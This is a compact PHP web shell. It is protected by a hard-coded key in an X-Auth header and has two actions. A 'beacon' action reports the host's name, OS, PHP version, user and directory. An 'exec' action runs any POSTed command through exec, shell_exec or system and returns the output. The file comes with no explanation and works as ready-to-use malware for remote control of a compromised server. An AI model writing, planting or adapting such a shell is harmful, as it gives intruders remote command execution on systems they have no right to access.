<?php
@ini_set('display_errors',0);@set_time_limit(0);
header('Content-Type: application/json');
$k='sentinelx_2024';
if(!isset($_SERVER['HTTP_X_AUTH'])||$_SERVER['HTTP_X_AUTH']!==$k){echo json_encode(['status'=>'error','message'=>'auth']);exit;}
$a=$_POST['action']??'beacon';
if($a==='beacon'){
    echo json_encode(['status'=>'ok','data'=>['hostname'=>gethostname(),'os'=>php_uname(),'php'=>phpversion(),'user'=>function_exists('get_current_user')?get_current_user():'N/A','cwd'=>getcwd()]]);
    exit;
}
if($a==='exec'){
    $c=$_POST['cmd']??'';$o='';
    if(function_exists('exec')){exec($c,$l);$o=implode("
",$l);}
    elseif(function_exists('shell_exec'))$o=shell_exec($c)??'';
    elseif(function_exists('system')){ob_start();system($c);$o=ob_get_clean();}
    echo json_encode(['status'=>'ok','output'=>$o,'cwd'=>getcwd()]);
    exit;
}